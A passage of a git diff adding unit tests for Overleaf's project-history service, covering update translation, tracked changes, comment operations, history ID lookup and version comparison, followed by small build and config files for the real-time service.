this.doc_id, + op: [ + { p: 0, i: 'foo' }, + { p: 23, i: 'bar' }, + { p: 0, d: 'foo' }, + { p: 20, d: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [20], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can handle operations in non-linear offset order', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 15, i: 'foo' }, + { p: 3, i: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: this.timestamp, + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, 'bar', 12, 'foo', 5], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles comment ops', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 0, i: 'foo' }, + { p: 3, d: 'bar' }, + { p: 5, c: 'comment this', t: 'comment-id-1' }, + { p: 7, c: 'another comment', t: 'comment-id-2' }, + { p: 9, c: '', t: 'comment-id-3' }, + { p: 10, i: 'baz' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: ['foo', -3, 17], + }, + { + pathname: 'main.tex', + commentId: 'comment-id-1', + ranges: [{ pos: 5, length: 12 }], + }, + { + pathname: 'main.tex', + commentId: 'comment-id-2', + ranges: [{ pos: 7, length: 15 }], + }, + { + pathname: 'main.tex', + commentId: 'comment-id-3', + ranges: [], + }, + { + pathname: 'main.tex', + textOperation: [10, 'baz', 10], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles insertions after the end of the document', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 3, i: '\\' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 2, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [2, '\\'], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('translates external source metadata into an origin', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 3, i: 'foo' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + type: 'external', + source: 'dropbox', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, 'foo', 17], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + origin: { kind: 'dropbox' }, + }, + ]) + }) + + it('errors on unexpected ops', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 5, z: 'bar' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + expect(() => { + this.UpdateTranslator.convertToChanges(this.project_id, updates) + }).to.throw('unexpected op type') + }) + }) + + describe('text updates with history metadata', function () { + it('handles deletes over tracked deletes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { i: 'foo', p: 3, hpos: 5 }, + { + d: 'quux', + p: 10, + hpos: 15, + trackedChanges: [ + { type: 'delete', offset: 2, length: 3 }, + { type: 'delete', offset: 3, length: 1 }, + ], + }, + { c: 'noteworthy', p: 8, t: 'comment-id', hpos: 11, hlen: 14 }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + history_doc_length: 30, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [5, 'foo', 7, -2, 3, -1, 1, -1, 10], + }, + { + pathname: 'main.tex', + commentId: 'comment-id', + ranges: [{ pos: 11, length: 14 }], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles tracked delete rejections specially', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ i: 'foo', p: 3, trackedDeleteRejection: true }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + { + r: 3, + tracking: { type: 'none' }, + }, + 14, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles tracked changes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { i: 'inserted', p: 5 }, + { d: 'deleted', p: 20 }, + { i: 'rejected deletion', p: 30, trackedDeleteRejection: true }, + { + d: 'rejected insertion', + p: 50, + trackedChanges: [{ type: 'insert', offset: 0, length: 18 }], + }, + ], + v: this.version, + meta: { + tc: 'tracked-change-id', + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 70, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 5, + { + i: 'inserted', + tracking: { + type: 'insert', + userId: this.user_id, + ts: new Date(this.timestamp).toISOString(), + }, + }, + 7, + { + r: 7, + tracking: { + type: 'delete', + userId: this.user_id, + ts: new Date(this.timestamp).toISOString(), + }, + }, + 3, + { + r: 17, + tracking: { type: 'none' }, + }, + 3, + -18, + 10, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles a delete over a mix of tracked inserts and tracked deletes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + d: 'abcdef', + p: 10, + trackedChanges: [ + { type: 'insert', offset: 0, length: 3 }, + { type: 'delete', offset: 2, length: 10 }, + { type: 'insert', offset: 2, length: 2 }, + ], + }, + ], + v: this.version, + meta: { + tc: 'tracking-id', + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + history_doc_length: 30, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 10, + -3, + 10, + -2, + { + r: 1, + tracking: { + type: 'delete', + userId: this.user_id, + ts: this.timestamp, + }, + }, + 4, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js b/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js new file mode 100644 index 0000000..137169b --- /dev/null +++ b/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js @@ -0,0 +1,552 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/UpdatesProcessor.js' + +describe('UpdatesProcessor', function () { + before(async function () { + this.extendLock = sinon.stub() + this.BlobManager = { + createBlobsForUpdates: sinon.stub(), + } + this.HistoryStoreManager = { + getMostRecentVersion: sinon.stub(), + sendChanges: sinon.stub().yields(), + } + this.LockManager = { + runWithLock: sinon.spy((key, runner, callback) => + runner(this.extendLock, callback) + ), + } + this.RedisManager = {} + this.UpdateCompressor = { + compressRawUpdates: sinon.stub(), + } + this.UpdateTranslator = { + convertToChanges: sinon.stub(), + isProjectStructureUpdate: sinon.stub(), + isTextUpdate: sinon.stub(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.SyncManager = { + expandSyncUpdates: sinon.stub(), + setResyncState: sinon.stub().yields(), + skipUpdatesDuringSync: sinon.stub(), + } + this.ErrorRecorder = { + getLastFailure: sinon.stub(), + record: sinon.stub().yields(null, { attempts: 1 }), + } + this.RetryManager = { + isFirstFailure: sinon.stub().returns(true), + isHardFailure: sinon.stub().returns(false), + } + this.Profiler = { + Profiler: class { + log() { + return this + } + + wrap(label, cb) { + return cb + } + + getTimeDelta() { + return 0 + } + + end() { + return 0 + } + }, + } + this.Metrics = { + gauge: sinon.stub(), + inc: sinon.stub(), + timing: sinon.stub(), + } + this.Settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + this.UpdatesProcessor = await esmock(MODULE_PATH, { + '../../../../app/js/BlobManager.js': this.BlobManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/LockManager.js': this.LockManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/UpdateCompressor.js': this.UpdateCompressor, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/Profiler.js': this.Profiler, + '../../../../app/js/RetryManager.js': this.RetryManager, + '../../../../app/js/Errors.js': Errors, + '@overleaf/metrics': this.Metrics, + '@overleaf/settings': this.Settings, + }) + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + this.ol_project_id = 'ol-project-id-234' + this.callback = sinon.stub() + this.temporary = 'temp-mock' + }) + + describe('processUpdatesForProject', function () { + beforeEach(function () { + this.error = new Error('error') + this.queueSize = 445 + this.UpdatesProcessor._mocks._countAndProcessUpdates = sinon + .stub() + .callsArgWith(3, this.error, this.queueSize) + }) + + describe('when there is no existing error', function () { + beforeEach(function (done) { + this.ErrorRecorder.getLastFailure.yields() + this.UpdatesProcessor.processUpdatesForProject(this.project_id, err => { + expect(err).to.equal(this.error) + done() + }) + }) + + it('processes updates', function () { + this.UpdatesProcessor._mocks._countAndProcessUpdates + .calledWith(this.project_id) + .should.equal(true) + }) + + it('records errors', function () { + this.ErrorRecorder.record + .calledWith(this.project_id, this.queueSize, this.error) + .should.equal(true) + }) + }) + }) + + describe('_getHistoryId', function () { + describe('projectHistoryId is not present', function () { + beforeEach(function () { + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's' }, + ] + this.WebApiManager.getHistoryId.yields(null) + }) + + it('returns null', function (done) { + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).to.be.null + done() + } + ) + }) + }) + + describe('projectHistoryId is not present in updates', function () { + beforeEach(function () { + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's' }, + ] + }) + + it('returns the id from web', function (done) { + this.projectHistoryId = '1234' + this.WebApiManager.getHistoryId.yields(null, this.projectHistoryId) + + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + + it('returns errors from web', function (done) { + this.error = new Error('oh no!') + this.WebApiManager.getHistoryId.yields(this.error) + + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error).to.equal(this.error) + done() + } + ) + }) + }) + + describe('projectHistoryId is present in some updates', function () { + beforeEach(function () { + this.projectHistoryId = '1234' + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's', projectHistoryId: this.projectHistoryId }, + { p: 2, i: 'd', projectHistoryId: this.projectHistoryId }, + ] + }) + + it('returns an error if the id is inconsistent between updates', function (done) { + this.updates[1].projectHistoryId = 2345 + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error.message).to.equal( + 'inconsistent project history id between updates' + ) + done() + } + ) + }) + + it('returns an error if the id is inconsistent between updates and web', function (done) { + this.WebApiManager.getHistoryId.yields(null, 2345) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error.message).to.equal( + 'inconsistent project history id between updates and web' + ) + done() + } + ) + }) + + it('returns the id if it is consistent between updates and web', function (done) { + this.WebApiManager.getHistoryId.yields(null, this.projectHistoryId) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + + it('returns the id if it is consistent between updates but unavaiable in web', function (done) { + this.WebApiManager.getHistoryId.yields(new Error('oh no!')) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + }) + }) + + describe('_processUpdates', function () { + beforeEach(function () { + this.mostRecentVersionInfo = { version: 1 } + this.rawUpdates = ['raw updates'] + this.expandedUpdates = ['expanded updates'] + this.filteredUpdates = ['filtered updates'] + this.compressedUpdates = ['compressed updates'] + this.updatesWithBlobs = ['updates with blob'] + this.changes = [ + { + toRaw() { + return 'change' + }, + }, + ] + this.newSyncState = { resyncProjectStructure: false } + + this.extendLock = sinon.stub().yields() + this.mostRecentChunk = 'fake-chunk' + + this.HistoryStoreManager.getMostRecentVersion.yields( + null, + this.mostRecentVersionInfo, + null, + '_lastChange', + this.mostRecentChunk + ) + this.SyncManager.skipUpdatesDuringSync.yields( + null, + this.filteredUpdates, + this.newSyncState + ) + this.SyncManager.expandSyncUpdates.callsArgWith( + 5, + null, + this.expandedUpdates + ) + this.UpdateCompressor.compressRawUpdates.returns(this.compressedUpdates) + this.BlobManager.createBlobsForUpdates.callsArgWith( + 4, + null, + this.updatesWithBlobs + ) + this.UpdateTranslator.convertToChanges.returns(this.changes) + }) + + describe('happy path', function () { + beforeEach(function (done) { + this.UpdatesProcessor._processUpdates( + this.project_id, + this.ol_project_id, + this.rawUpdates, + this.extendLock, + err => { + this.callback(err) + done() + } + ) + }) + + it('should get the latest version id', function () { + this.HistoryStoreManager.getMostRecentVersion.should.have.been.calledWith( + this.project_id, + this.ol_project_id + ) + }) + + it('should skip updates when resyncing', function () { + this.SyncManager.skipUpdatesDuringSync.should.have.been.calledWith( + this.project_id, + this.rawUpdates + ) + }) + + it('should expand sync updates', function () { + this.SyncManager.expandSyncUpdates.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + this.mostRecentChunk, + this.filteredUpdates, + this.extendLock + ) + }) + + it('should compress updates', function () { + this.UpdateCompressor.compressRawUpdates.should.have.been.calledWith( + this.expandedUpdates + ) + }) + + it('should create any blobs for the updates', function () { + this.BlobManager.createBlobsForUpdates.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + this.compressedUpdates + ) + }) + + it('should convert the updates into a change requests', function () { + this.UpdateTranslator.convertToChanges.should.have.been.calledWith( + this.project_id, + this.updatesWithBlobs + ) + }) + + it('should send the change request to the history store', function () { + this.HistoryStoreManager.sendChanges.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + ['change'] + ) + }) + + it('should set the sync state', function () { + this.SyncManager.setResyncState.should.have.been.calledWith( + this.project_id, + this.newSyncState + ) + }) + + it('should call the callback with no error', function () { + this.callback.should.have.been.called + }) + }) + + describe('with an error converting changes', function () { + beforeEach(function (done) { + this.err = new Error() + this.UpdateTranslator.convertToChanges.throws(this.err) + this.callback = sinon.stub() + + this.UpdatesProcessor._processUpdates( + this.project_id, + this.ol_project_id, + this.rawUpdates, + this.extendLock, + err => { + this.callback(err) + done() + } + ) + }) + + it('should call the callback with the error', function () { + this.callback.should.have.been.calledWith(this.err) + }) + }) + }) + + describe('_skipAlreadyAppliedUpdates', function () { + before(function () { + this.UpdateTranslator.isProjectStructureUpdate.callsFake( + update => update.version != null + ) + this.UpdateTranslator.isTextUpdate.callsFake(update => update.v != null) + }) + + describe('with all doc ops in order', function () { + before(function () { + this.updates = [ + { doc: 'id', v: 1 }, + { doc: 'id', v: 2 }, + { doc: 'id', v: 3 }, + { doc: 'id', v: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with all project ops in order', function () { + before(function () { + this.updates = [ + { version: 1 }, + { version: 2 }, + { version: 3 }, + { version: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with all multiple doc and ops in order', function () { + before(function () { + this.updates = [ + { doc: 'id1', v: 1 }, + { doc: 'id1', v: 2 }, + { doc: 'id1', v: 3 }, + { doc: 'id1', v: 4 }, + { doc: 'id2', v: 1 }, + { doc: 'id2', v: 2 }, + { doc: 'id2', v: 3 }, + { doc: 'id2', v: 4 }, + { version: 1 }, + { version: 2 }, + { version: 3 }, + { version: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with doc ops out of order', function () { + before(function () { + this.updates = [ + { doc: 'id', v: 1 }, + { doc: 'id', v: 2 }, + { doc: 'id', v: 4 }, + { doc: 'id', v: 3 }, + ] + this.skipFn = sinon.spy( + this.UpdatesProcessor._mocks, + '_skipAlreadyAppliedUpdates' + ) + try { + this.updatesToApply = + this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + } catch (error) {} + }) + + after(function () { + this.skipFn.restore() + }) + + it('should throw an exception', function () { + this.skipFn.threw('OpsOutOfOrderError').should.equal(true) + }) + }) + + describe('with project ops out of order', function () { + before(function () { + this.updates = [ + { version: 1 }, + { version: 2 }, + { version: 4 }, + { version: 3 }, + ] + this.skipFn = sinon.spy( + this.UpdatesProcessor._mocks, + '_skipAlreadyAppliedUpdates' + ) + try { + this.updatesToApply = + this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + } catch (error) {} + }) + + after(function () { + this.skipFn.restore() + }) + + it('should throw an exception', function () { + this.skipFn.threw('OpsOutOfOrderError').should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/Versions/VersionTest.js b/services/project-history/test/unit/js/Versions/VersionTest.js new file mode 100644 index 0000000..8f6f0e1 --- /dev/null +++ b/services/project-history/test/unit/js/Versions/VersionTest.js @@ -0,0 +1,170 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/Versions.js' + +describe('Versions', function () { + beforeEach(async function () { + return (this.Versions = await esmock(MODULE_PATH)) + }) + + describe('compare', function () { + describe('for greater major version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.1', '1.1').should.equal(+1) + }) + }) + + describe('for lesser major version', function () { + return it('should return -1', function () { + return this.Versions.compare('1.1', '2.1').should.equal(-1) + }) + }) + + describe('for equal major versions with no minor version', function () { + return it('should return 0', function () { + return this.Versions.compare('2', '2').should.equal(0) + }) + }) + + describe('for equal major versions with greater minor version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.3', '2.1').should.equal(+1) + }) + }) + + describe('for equal major versions with lesser minor version', function () { + return it('should return -1', function () { + return this.Versions.compare('2.1', '2.3').should.equal(-1) + }) + }) + + describe('for equal major versions with greater minor version (non lexical)', function () { + return it('should return +1', function () { + return this.Versions.compare('2.10', '2.9').should.equal(+1) + }) + }) + + describe('for equal major versions with lesser minor version (non lexical)', function () { + return it('should return +1', function () { + return this.Versions.compare('2.9', '2.10').should.equal(-1) + }) + }) + + describe('for a single major version vs a major+minor version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.1', '1').should.equal(+1) + }) + }) + + describe('for a major+minor version vs a single major version', function () { + return it('should return -1', function () { + return this.Versions.compare('1', '2.1').should.equal(-1) + }) + }) + + describe('for equal major versions with greater minor version vs zero', function () { + return it('should return +1', function () { + return this.Versions.compare('2.3', '2.0').should.equal(+1) + }) + }) + + return describe('for equal major versions with lesser minor version of zero', function () { + return it('should return -1', function () { + return this.Versions.compare('2.0', '2.3').should.equal(-1) + }) + }) + }) + + describe('gt', function () { + describe('for greater major version', function () { + return it('should return true', function () { + return this.Versions.gt('2.1', '1.1').should.equal(true) + }) + }) + + describe('for lesser major version', function () { + return it('should return false', function () { + return this.Versions.gt('1.1', '2.1').should.equal(false) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return false', function () { + return this.Versions.gt('2', '2').should.equal(false) + }) + }) + }) + + describe('gte', function () { + describe('for greater major version', function () { + return it('should return true', function () { + return this.Versions.gte('2.1', '1.1').should.equal(true) + }) + }) + + describe('for lesser major version', function () { + return it('should return false', function () { + return this.Versions.gte('1.1', '2.1').should.equal(false) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return true', function () { + return this.Versions.gte('2', '2').should.equal(true) + }) + }) + }) + + describe('lt', function () { + describe('for greater major version', function () { + return it('should return false', function () { + return this.Versions.lt('2.1', '1.1').should.equal(false) + }) + }) + + describe('for lesser major version', function () { + return it('should return true', function () { + return this.Versions.lt('1.1', '2.1').should.equal(true) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return false', function () { + return this.Versions.lt('2', '2').should.equal(false) + }) + }) + }) + + return describe('lte', function () { + describe('for greater major version', function () { + return it('should return false', function () { + return this.Versions.lte('2.1', '1.1').should.equal(false) + }) + }) + + describe('for lesser major version', function () { + return it('should return true', function () { + return this.Versions.lte('1.1', '2.1').should.equal(true) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return true', function () { + return this.Versions.lte('2', '2').should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js b/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js new file mode 100644 index 0000000..7a9c795 --- /dev/null +++ b/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js @@ -0,0 +1,153 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import { RequestFailedError } from '@overleaf/fetch-utils' + +const MODULE_PATH = '../../../../app/js/WebApiManager.js' + +describe('WebApiManager', function () { + beforeEach(async function () { + this.settings = { + apis: { + web: { + url: 'http://example.com', + user: 'overleaf', + pass: 'password', + }, + }, + } + this.userId = 'mock-user-id' + this.projectId = 'mock-project-id' + this.project = { features: 'mock-features' } + this.olProjectId = 12345 + this.Metrics = { inc: sinon.stub() } + this.RedisManager = { + promises: { + getCachedHistoryId: sinon.stub(), + setCachedHistoryId: sinon.stub().resolves(), + }, + } + this.FetchUtils = { + fetchNothing: sinon.stub().resolves(), + fetchJson: sinon.stub(), + RequestFailedError, + } + this.WebApiManager = await esmock(MODULE_PATH, { + '@overleaf/fetch-utils': this.FetchUtils, + '@overleaf/settings': this.settings, + '@overleaf/metrics': this.Metrics, + '../../../../app/js/RedisManager.js': this.RedisManager, + }) + this.WebApiManager.setRetryTimeoutMs(100) + }) + + describe('getHistoryId', function () { + describe('when there is no cached value and the web request is successful', function () { + beforeEach(function () { + this.RedisManager.promises.getCachedHistoryId + .withArgs(this.projectId) // first call, no cached value returned + .onCall(0) + .resolves(null) + this.RedisManager.promises.getCachedHistoryId + .withArgs(this.projectId) // subsequent calls, return cached value + .resolves(this.olProjectId) + this.RedisManager.promises.getCachedHistoryId + .withArgs('mock-project-id-2') // no cached value for other project + .resolves(null) + this.FetchUtils.fetchJson.resolves({ + overleaf: { history: { id: this.olProjectId } }, + }) + }) + + it('should only request project details once per project', async function () { + for (let i = 0; i < 5; i++) { + await this.WebApiManager.promises.getHistoryId(this.projectId) + } + this.FetchUtils.fetchJson.should.have.been.calledOnce + + await this.WebApiManager.promises.getHistoryId('mock-project-id-2') + this.FetchUtils.fetchJson.should.have.been.calledTwice + }) + + it('should cache the history id', async function () { + const olProjectId = await this.WebApiManager.promises.getHistoryId( + this.projectId + ) + this.RedisManager.promises.setCachedHistoryId + .calledWith(this.projectId, olProjectId) + .should.equal(true) + }) + + it("should return the project's history id", async function () { + const olProjectId = await this.WebApiManager.promises.getHistoryId( + this.projectId + ) + + expect(this.FetchUtils.fetchJson).to.have.been.calledWithMatch( + `${this.settings.apis.web.url}/project/${this.projectId}/details`, + { + basicAuth: { + user: this.settings.apis.web.user, + password: this.settings.apis.web.pass, + }, + } + ) + expect(olProjectId).to.equal(this.olProjectId) + }) + }) + + describe('when the web API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.FetchUtils.fetchJson.rejects(this.error) + this.RedisManager.promises.getCachedHistoryId.resolves(null) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith(this.error) + }) + }) + + describe('when web returns a 404', function () { + beforeEach(function () { + this.FetchUtils.fetchJson.rejects( + new RequestFailedError( + 'http://some-url', + {}, + { status: 404 }, + 'Not found' + ) + ) + this.RedisManager.promises.getCachedHistoryId.resolves(null) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith('got a 404 from web api') + }) + }) + + describe('when web returns a failure error code', function () { + beforeEach(function () { + this.RedisManager.promises.getCachedHistoryId.resolves(null) + this.FetchUtils.fetchJson.rejects( + new RequestFailedError( + 'http://some-url', + {}, + { status: 500 }, + 'Error' + ) + ) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith(RequestFailedError) + }) + }) + }) +}) diff --git a/services/project-history/tsconfig.json b/services/project-history/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/project-history/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/real-time/.gitignore b/services/real-time/.gitignore new file mode 100644 index 0000000..80bac79 --- /dev/null +++ b/services/real-time/.gitignore @@ -0,0 +1,5 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/real-time/.mocharc.json b/services/real-time/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/real-time/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/real-time/.nvmrc b/services/real-time/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/real-time/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/real-time/Dockerfile b/services/real-time/Dockerfile new file mode 100644 index 0000000..d1f2046 --- /dev/null +++ b/services/real-time/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/real-time + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see 